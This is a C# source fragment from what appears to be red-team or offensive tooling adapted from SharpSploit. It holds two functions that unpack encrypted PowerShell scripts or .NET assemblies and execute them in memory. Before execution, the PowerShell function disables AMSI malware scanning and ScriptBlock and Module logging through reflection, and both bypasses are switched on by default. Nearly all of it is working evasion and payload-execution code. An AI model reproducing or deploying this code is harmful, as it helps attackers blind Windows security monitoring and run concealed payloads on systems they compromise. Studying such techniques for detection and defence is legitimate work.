// Following a discussion with cobbr over the implementation this was a much more elegant solution :) // Almost directly ripped from https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Execution/Shell.cs#L37-L55 // Credits to Ryan Cobb /// <summary> /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). /// </summary> /// <param name="PowerShellCode">PowerShell code to execute.</param> /// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param> /// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param> /// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param> /// <returns>Output of executed PowerShell.</returns> /// <remarks> /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module /// logging bypass goes to Lee Christensen (@_tifkin). /// </remarks> public void RunPowerShell(string encpath, string encpass, string outfile, string scriptname, string arguments, bool BypassLogging = true, bool BypassAmsi = true) { Archiver archiver = new Archiver(); byte[] unpacked = archiver.ArchiveHelper(encpath, encpass, scriptname); string PowerShellCode = System.Text.Encoding.UTF8.GetString(unpacked); PowerShellCode += "\n" + arguments; System.Windows.Forms.MessageBox.Show(PowerShellCode); if (PowerShellCode == null || PowerShellCode == "") { return; } using (PowerShell ps = PowerShell.Create()) { BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; if (BypassLogging) { var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } } if (BypassAmsi) { var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); if (amsiUtils != null) { amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); } } ps.AddScript(PowerShellCode); var results = ps.Invoke(); string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); ps.Commands.Clear(); System.IO.File.WriteAllText(outfile, output); } }
public void RunDotNet(string encpath, string encpass, string outfile, string binname, string arguments) { Archiver archiver = new Archiver(); byte[] unpacked = archiver.ArchiveHelper(encpath, encpass, binname); DotNetLoader dnl = new DotNetLoader(); object[] convertedArgs = arguments.Split(' '); MemoryStream mem = new MemoryStream(10000); StreamWriter writer = new StreamWriter(mem); Console.SetOut(writer); dnl.loadAssembly(unpacked, convertedArgs); writer.Close(); string s = Encoding.Default.GetString(mem.ToArray()); mem.Close(); System.IO.File.WriteAllText(outfile, s.ToString()); }